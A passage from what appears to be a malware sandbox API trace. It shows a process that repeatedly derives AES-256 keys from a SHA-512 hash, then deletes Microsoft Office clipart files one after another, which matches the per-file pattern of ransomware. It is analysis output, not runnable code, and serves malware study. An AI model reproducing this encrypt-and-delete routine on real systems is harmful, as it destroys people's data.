Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 1 [0185.827] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06102_.wmf")) returned 1 [0185.828] CryptDestroyKey (hKey=0x9ad6b8) returned 1 [0185.828] wcslen (_String="OK") returned 0x2 [0185.828] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0185.828] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0185.828] CryptDestroyKey (hKey=0x9ad438) returned 1 [0185.828] CryptDestroyHash (hHash=0x9ad178) returned 1 [0185.828] CryptReleaseContext (hProv=0x8e3550, dwFlags=0x0) returned 1 [0185.831] CryptCreateHash (in: hProv=0x8e2de0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448b4 | out: phHash=0x1d4448b4) returned 1 [0185.831] CryptHashData (hHash=0x9ad8b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.831] CryptDeriveKey (in: hProv=0x8e2de0, Algid=0x6610, hBaseData=0x9ad8b8, dwFlags=0x4, phKey=0x1d4448b8 | out: phKey=0x1d4448b8*=0x9ad238) returned 1 [0185.831] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0185.831] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0185.831] wcslen (_String="\\\\?\\") returned 0x4 [0185.913] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 1 [0185.914] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06200_.wmf")) returned 1 [0185.915] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0185.915] wcslen (_String="OK") returned 0x2 [0185.915] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0185.915] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0185.915] CryptDestroyKey (hKey=0x9ad238) returned 1 [0185.915] CryptDestroyHash (hHash=0x9ad8b8) returned 1 [0185.915] CryptReleaseContext (hProv=0x8e2de0, dwFlags=0x0) returned 1 [0185.917] CryptCreateHash (in: hProv=0x8e3aa0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0185.917] CryptHashData (hHash=0x9ad4f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.917] CryptDeriveKey (in: hProv=0x8e3aa0, Algid=0x6610, hBaseData=0x9ad4f8, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad1b8) returned 1 [0185.917] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0185.917] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0185.917] wcslen (_String="\\\\?\\") returned 0x4 [0186.014] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 1 [0186.014] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07761_.wmf")) returned 1 [0186.015] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0186.015] wcslen (_String="OK") returned 0x2 [0186.016] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0186.016] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0186.016] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0186.016] CryptDestroyHash (hHash=0x9ad4f8) returned 1 [0186.016] CryptReleaseContext (hProv=0x8e3aa0, dwFlags=0x0) returned 1 [0186.017] CryptCreateHash (in: hProv=0x8e33b8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44477c | out: phHash=0x1d44477c) returned 1 [0186.017] CryptHashData (hHash=0x9ad7f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.017] CryptDeriveKey (in: hProv=0x8e33b8, Algid=0x6610, hBaseData=0x9ad7f8, dwFlags=0x4, phKey=0x1d444780 | out: phKey=0x1d444780*=0x9ad438) returned 1 [0186.017] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0186.017] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0186.017] wcslen (_String="\\\\?\\") returned 0x4 [0186.331] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 1 [0186.331] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07804_.wmf")) returned 1 [0186.332] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0186.332] wcslen (_String="OK") returned 0x2 [0186.332] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0186.332] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0186.332] CryptDestroyKey (hKey=0x9ad438) returned 1 [0186.332] CryptDestroyHash (hHash=0x9ad7f8) returned 1 [0186.332] CryptReleaseContext (hProv=0x8e33b8, dwFlags=0x0) returned 1 [0186.334] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44477c | out: phHash=0x1d44477c) returned 1 [0186.334] CryptHashData (hHash=0x9ad478, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.334] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad478, dwFlags=0x4, phKey=0x1d444780 | out: phKey=0x1d444780*=0x9ad8b8) returned 1 [0186.334] CryptSetKeyParam (hKey=0x9ad8b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0186.334] CryptSetKeyParam (hKey=0x9ad8b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0186.334] wcslen (_String="\\\\?\\") returned 0x4 [0186.641] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 1 [0186.641] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07831_.wmf")) returned 1 [0186.642] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0186.642] wcslen (_String="OK") returned 0x2 [0186.642] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0186.642] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0186.642] CryptDestroyKey (hKey=0x9ad8b8) returned 1 [0186.642] CryptDestroyHash (hHash=0x9ad478) returned 1 [0186.642] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0186.644] CryptCreateHash (in: hProv=0x8e3b28, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44489c | out: phHash=0x1d44489c) returned 1 [0186.644] CryptHashData (hHash=0x9ad7b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.644] CryptDeriveKey (in: hProv=0x8e3b28, Algid=0x6610, hBaseData=0x9ad7b8, dwFlags=0x4, phKey=0x1d4448a0 | out: phKey=0x1d4448a0*=0x9ad678) returned 1 [0186.644] CryptSetKeyParam (hKey=0x9ad678, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0186.644] CryptSetKeyParam (hKey=0x9ad678, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0186.644] wcslen (_String="\\\\?\\") returned 0x4 [0186.691] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 1 [0186.691] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08758_.wmf")) returned 1 [0186.692] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0186.692] wcslen (_String="OK") returned 0x2 [0186.692] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0186.692] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0186.692] CryptDestroyKey (hKey=0x9ad678) returned 1 [0186.692] CryptDestroyHash (hHash=0x9ad7b8) returned 1 [0186.692] CryptReleaseContext (hProv=0x8e3b28, dwFlags=0x0) returned 1 [0186.694] CryptCreateHash (in: hProv=0x8e3aa0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444944 | out: phHash=0x1d444944) returned 1 [0186.694] CryptHashData (hHash=0x9ad478, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.694] CryptDeriveKey (in: hProv=0x8e3aa0, Algid=0x6610, hBaseData=0x9ad478, dwFlags=0x4, phKey=0x1d444948 | out: phKey=0x1d444948*=0x9ad6b8) returned 1 [0186.694] CryptSetKeyParam (hKey=0x9ad6b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0186.694] CryptSetKeyParam (hKey=0x9ad6b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0186.694] wcslen (_String="\\\\?\\") returned 0x4 [0186.723] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 1 [0186.723] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08773_.wmf")) returned 1 [0186.724] CryptDestroyKey (hKey=0x9ad338) returned 1 [0186.724] wcslen (_String="OK") returned 0x2 [0186.724] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0186.724] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0186.724] CryptDestroyKey (hKey=0x9ad6b8) returned 1 [0186.724] CryptDestroyHash (hHash=0x9ad478) returned 1 [0186.724] CryptReleaseContext (hProv=0x8e3aa0, dwFlags=0x0) returned 1 [0186.726] CryptCreateHash (in: hProv=0x8e3330, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447ac | out: phHash=0x1d4447ac) returned 1 [0186.726] CryptHashData (hHash=0x9ad6b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.726] CryptDeriveKey (in: hProv=0x8e3330, Algid=0x6610, hBaseData=0x9ad6b8, dwFlags=0x4, phKey=0x1d4447b0 | out: phKey=0x1d4447b0*=0x9ad338) returned 1 [0186.726] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0186.726] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0186.726] wcslen (_String="\\\\?\\") returned 0x4 [0186.933] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 1 [0186.934] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08808_.wmf")) returned 1 [0186.935] CryptDestroyKey (hKey=0x9ad878) returned 1 [0186.935] wcslen (_String="OK") returned 0x2 [0186.935] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0186.935] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0186.935] CryptDestroyKey (hKey=0x9ad338) returned 1 [0186.935] CryptDestroyHash (hHash=0x9ad6b8) returned 1 [0186.935] CryptReleaseContext (hProv=0x8e3330, dwFlags=0x0) returned 1 [0186.937] CryptCreateHash (in: hProv=0x8e3110, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444734 | out: phHash=0x1d444734) returned 1 [0186.937] CryptHashData (hHash=0x9ad6b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.937] CryptDeriveKey (in: hProv=0x8e3110, Algid=0x6610, hBaseData=0x9ad6b8, dwFlags=0x4, phKey=0x1d444738 | out: phKey=0x1d444738*=0x9ad738) returned 1 [0186.937] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0186.937] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0186.937] wcslen (_String="\\\\?\\") returned 0x4 [0187.008] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 1 [0187.008] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08868_.wmf")) returned 1 [0187.009] CryptDestroyKey (hKey=0x9ad478) returned 1 [0187.009] wcslen (_String="OK") returned 0x2 [0187.009] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0187.009] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0187.009] CryptDestroyKey (hKey=0x9ad738) returned 1 [0187.009] CryptDestroyHash (hHash=0x9ad6b8) returned 1 [0187.009] CryptReleaseContext (hProv=0x8e3110, dwFlags=0x0) returned 1 [0187.012] CryptCreateHash (in: hProv=0x8e2e68, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444734 | out: phHash=0x1d444734) returned 1 [0187.012] CryptHashData (hHash=0x9ad478, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.012] CryptDeriveKey (in: hProv=0x8e2e68, Algid=0x6610, hBaseData=0x9ad478, dwFlags=0x4, phKey=0x1d444738 | out: phKey=0x1d444738*=0x9ad138) returned 1 [0187.012] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0187.012] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0187.012] wcslen (_String="\\\\?\\") returned 0x4 [0187.018] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 1 [0187.019] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09031_.wmf")) returned 1 [0187.020] CryptDestroyKey (hKey=0x9ad4f8) returned 1 [0187.020] wcslen (_String="OK") returned 0x2 [0187.020] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0187.020] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0187.020] CryptDestroyKey (hKey=0x9ad138) returned 1 [0187.020] CryptDestroyHash (hHash=0x9ad478) returned 1 [0187.020] CryptReleaseContext (hProv=0x8e2e68, dwFlags=0x0) returned 1 [0187.022] CryptCreateHash (in: hProv=0x8e3b28, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447c4 | out: phHash=0x1d4447c4) returned 1 [0187.022] CryptHashData (hHash=0x9ad138, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.022] CryptDeriveKey (in: hProv=0x8e3b28, Algid=0x6610, hBaseData=0x9ad138, dwFlags=0x4, phKey=0x1d4447c8 | out: phKey=0x1d4447c8*=0x9ad5b8) returned 1 [0187.022] CryptSetKeyParam (hKey=0x9ad5b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0187.022] CryptSetKeyParam (hKey=0x9ad5b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0187.022] wcslen (_String="\\\\?\\") returned 0x4 [0187.055] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 1 [0187.056] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09194_.wmf")) returned 1 [0187.056] CryptDestroyKey (hKey=0x9ad238) returned 1 [0187.056] wcslen (_String="OK") returned 0x2 [0187.056] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0187.057] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0187.057] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0187.057] CryptDestroyHash (hHash=0x9ad138) returned 1 [0187.057] CryptReleaseContext (hProv=0x8e3b28, dwFlags=0x0) returned 1 [0187.058] CryptCreateHash (in: hProv=0x8e3110, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0187.058] CryptHashData (hHash=0x9ad7f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.058] CryptDeriveKey (in: hProv=0x8e3110, Algid=0x6610, hBaseData=0x9ad7f8, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad138) returned 1 [0187.058] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0187.058] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0187.058] wcslen (_String="\\\\?\\") returned 0x4 [0187.081] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 1 [0187.081] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09662_.wmf")) returned 1 [0187.082] CryptDestroyKey (hKey=0x9ad238) returned 1 [0187.082] wcslen (_String="OK") returned 0x2 [0187.082] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0187.082] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0187.082] CryptDestroyKey (hKey=0x9ad138) returned 1 [0187.082] CryptDestroyHash (hHash=0x9ad7f8) returned 1 [0187.082] CryptReleaseContext (hProv=0x8e3110, dwFlags=0x0) returned 1 [0187.083] CryptCreateHash (in: hProv=0x8e2f78, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444764 | out: phHash=0x1d444764) returned 1 [0187.083] CryptHashData (hHash=0x9ad438, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.084] CryptDeriveKey (in: hProv=0x8e2f78, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d444768 | out: phKey=0x1d444768*=0x9ad2f8) returned 1 [0187.084] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0187.084] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0187.084] wcslen (_String="\\\\?\\") returned 0x4 [0187.182] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 1 [0187.182] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09664_.wmf")) returned 1 [0187.183] CryptDestroyKey (hKey=0x9ad478) returned 1 [0187.183] wcslen (_String="OK") returned 0x2 [0187.183] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0187.183] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0187.183] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0187.183] CryptDestroyHash (hHash=0x9ad438) returned 1 [0187.183] CryptReleaseContext (hProv=0x8e2f78, dwFlags=0x0) returned 1 [0187.185] CryptCreateHash (in: hProv=0x8e37f8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444a1c | out: phHash=0x1d444a1c) returned 1 [0187.185] CryptHashData (hHash=0x9ad1b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.185] CryptDeriveKey (in: hProv=0x8e37f8, Algid=0x6610, hBaseData=0x9ad1b8, dwFlags=0x4, phKey=0x1d444a20 | out: phKey=0x1d444a20*=0x9ad178) returned 1 [0187.185] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0187.185] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0187.186] wcslen (_String="\\\\?\\") returned 0x4 [0187.270] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 1 [0187.271] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd10890_.gif")) returned 1 [0187.272] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0187.272] wcslen (_String="OK") returned 0x2 [0187.272] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0187.272] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0187.272] CryptDestroyKey (hKey=0x9ad178) returned 1 [0187.272] CryptDestroyHash (hHash=0x9ad1b8) returned 1 [0187.272] CryptReleaseContext (hProv=0x8e37f8, dwFlags=0x0) returned 1 [0187.274] CryptCreateHash (in: hProv=0x8e3198, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448b4 | out: phHash=0x1d4448b4) returned 1 [0187.274] CryptHashData (hHash=0x9ad438, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.274] CryptDeriveKey (in: hProv=0x8e3198, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d4448b8 | out: phKey=0x1d4448b8*=0x9ad1b8) returned 1 [0187.274] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0187.274] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0187.274] wcslen (_String="\\\\?\\") returned 0x4 [0187.288] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 1 [0187.288] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd10972_.gif")) returned 1 [0187.289] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0187.289] wcslen (_String="OK") returned 0x2 [0187.289] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0187.289] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0187.289] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0187.289] CryptDestroyHash (hHash=0x9ad438) returned 1 [0187.289] CryptReleaseContext (hProv=0x8e3198, dwFlags=0x0) returned 1 [0187.291] CryptCreateHash (in: hProv=0x8e2de0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0187.291] CryptHashData (hHash=0x9ad378, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.291] CryptDeriveKey (in: hProv=0x8e2de0, Algid=0x6610, hBaseData=0x9ad378, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad2b8) returned 1 [0187.291] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0187.291] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0187.291] wcslen (_String="\\\\?\\") returned 0x4 [0187.351] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 1 [0187.351] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19563_.gif")) returned 1 [0187.352] CryptDestroyKey (hKey=0x9ad238) returned 1 [0187.352] wcslen (_String="OK") returned 0x2 [0187.352] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0187.352] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0187.352] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0187.352] CryptDestroyHash (hHash=0x9ad378) returned 1 [0187.352] CryptReleaseContext (hProv=0x8e2de0, dwFlags=0x0) returned 1 [0187.353] CryptCreateHash (in: hProv=0x8e3220, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444884 | out: phHash=0x1d444884) returned 1 [0187.353] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.353] CryptDeriveKey (in: hProv=0x8e3220, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d444888 | out: phKey=0x1d444888*=0x9ad238) returned 1 [0187.353] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0187.354] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0187.354] wcslen (_String="\\\\?\\") returned 0x4 [0187.382] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 1 [0187.382] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19582_.gif")) returned 1 [0187.383] CryptDestroyKey (hKey=0x9ad138) returned 1 [0187.383] wcslen (_String="OK") returned 0x2 [0187.383] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0187.383] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0187.383] CryptDestroyKey (hKey=0x9ad238) returned 1 [0187.383] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0187.383] CryptReleaseContext (hProv=0x8e3220, dwFlags=0x0) returned 1 [0187.385] CryptCreateHash (in: hProv=0x8e2d58, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449bc | out: phHash=0x1d4449bc) returned 1 [0187.385] CryptHashData (hHash=0x9ad738, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.385] CryptDeriveKey (in: hProv=0x8e2d58, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d4449c0 | out: phKey=0x1d4449c0*=0x9ad438) returned 1 [0187.385] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0187.385] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0187.385] wcslen (_String="\\\\?\\") returned 0x4 [0187.429] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 1 [0187.429] DeleteFileW 